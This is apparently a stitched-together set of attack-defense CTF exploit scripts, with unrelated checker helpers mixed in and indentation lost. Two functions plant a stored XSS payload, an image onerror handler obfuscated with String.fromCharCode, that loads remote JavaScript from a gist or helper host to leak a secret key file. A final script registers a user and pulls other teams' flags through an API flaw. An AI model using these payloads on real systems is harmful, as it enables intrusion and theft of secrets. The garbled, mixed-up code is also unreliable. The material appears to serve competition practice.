def leak_key():
xss_script_url = 'https://gist.githubusercontent.com/jnovikov/7f3d47b45cc8b9696cfe3882cb88f181/raw/4cad1ba6c459fb5c2b86d1b8f15478186c807edc/moim.js'
email = checklib.rnd_username() + '@cbsctf.live'
password = checklib.rnd_password()
s = requests.Session()
s.post(f'http://{IP}:8000/api/register',
json={
'email': email,
'password': password
},
headers={'Accept-Encoding': 'application/json'})
pwn_url = '<script src="{}"></script>'.format(xss_script_url)
pwn_code = []
for c in pwn_url:
x = 'String.fromCharCode({})'.format(ord(c))
pwn_code.append(x)
sploit = 'document.write(' + '+'.join(pwn_code) + ')'
params = {'width': '50%', 'onerror': sploit}
sync_data = {
'capacity': 10,
'title': 'hehe',
'description': 'Totally not an exploit',
'image_url': 'http://keklolkek.kek',
'image_params': params
}
resp = s.post(f'http://{IP}:8000/api/sync', json=sync_data)
data = resp.json()
sync_id = data['id']
r = s.get(f'http://{IP}:8000/api/sync/{sync_id}/challenge')
challenge = r.json().get('challenge')
resp = s.post('http://{}:8000/api/sync/{}/join'.format(IP, sync_id),
json={
'nickname': 'asd',
'challenge_answer': mine_answer(challenge)
})
public_id = resp.json().get('public_id')
for _ in range(20):
sleep(0.5)
r = s.get(f'http://{IP}:8000/api/ticket/' + public_id)
ticket_data = r.json()
ticket_url = ticket_data.get('ticket_url')
if ticket_url:
url = f'http://{IP}:8000{ticket_url}'
resp = s.get(url)
env_file_data = extract_text(resp).decode('utf-8', 'ignore')
matches = regex.findall(env_file_data)
if len(matches) == 0:
return None
return matches[0]
else:
print("Failed to leak key. Timeout", flush=True)
return None
def register_service(self, password=None):
username = checklib.rnd_username()
if not password:
password = checklib.rnd_password()
r = requests.get(f'{self.url}/registerForm',
params={
'login': username,
'password': password
})
checklib.check_response(r, 'Could not register')
return username, password
def _rnd_slave(self, desc, l, r):
slave = {
"имя": rnd_username(),
"описание": desc,
"цена": randint(l, r),
}
for i in range(randint(0, 5)):
if randint(0, 1) == 0:
k = rnd_string(5)
v = rnd_string(10)
slave[k] = v
else:
k = rnd_string(5)
subslave = {}
for j in range(randint(1, 3)):
ks = rnd_string(4)
vs = rnd_string(15)
subslave[ks] = vs
slave[k] = subslave
return slave
def leak_key():
email = checklib.rnd_username() + '@cbsctf.live'
password = checklib.rnd_password()
s = requests.Session()
resp = s.post(f'http://{IP}:8000/api/register',
json={
'email': email,
'password': password
},
headers={'Accept-Encoding': 'application/json'})
pwn_url = f'<script src="{helper_url}/hckk?ip={IP}"></script>'
pwn_code = []
for c in pwn_url:
x = 'String.fromCharCode({})'.format(ord(c))
pwn_code.append(x)
sploit = 'document.write(' + '+'.join(pwn_code) + ')'
params = {'width': '50%', 'onerror': sploit}
sync_data = {
'capacity': 10,
'title': 'Anime sync!',
'description': 'Join us at kek on kek',
'image_url': 'http://keklolkek.kek',
'image_params': params
}
resp = s.post(f'http://{IP}:8000/api/sync', json=sync_data)
data = resp.json()
sync_id = data['id']
resp = requests.post('http://{}:8000/api/sync/{}/join'.format(IP, sync_id),
json={'nickname': 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA='})
print(resp.text, flush=True)
import sys
from checklib import get_initialized_session, rnd_username, rnd_password
ip = sys.argv[1]
PORT = 6091
url = f"http://{ip}:{PORT}/api"
s = get_initialized_session()
u, p = rnd_username(), rnd_password()
s.post(f"{url}/register/",
json={
'username': u,
'password': p,
'home': 'evilhacker',
})
s.post(f"{url}/login/", json={
'username': u,
'password': p,
})
cid = s.post(f"{url}/code/", json={'work': 'work', 'code': []}).json()['ok']
flags = s.get(f"{url}/code/{cid}/").json()['ok']
for i in flags:
print(i, flush=True)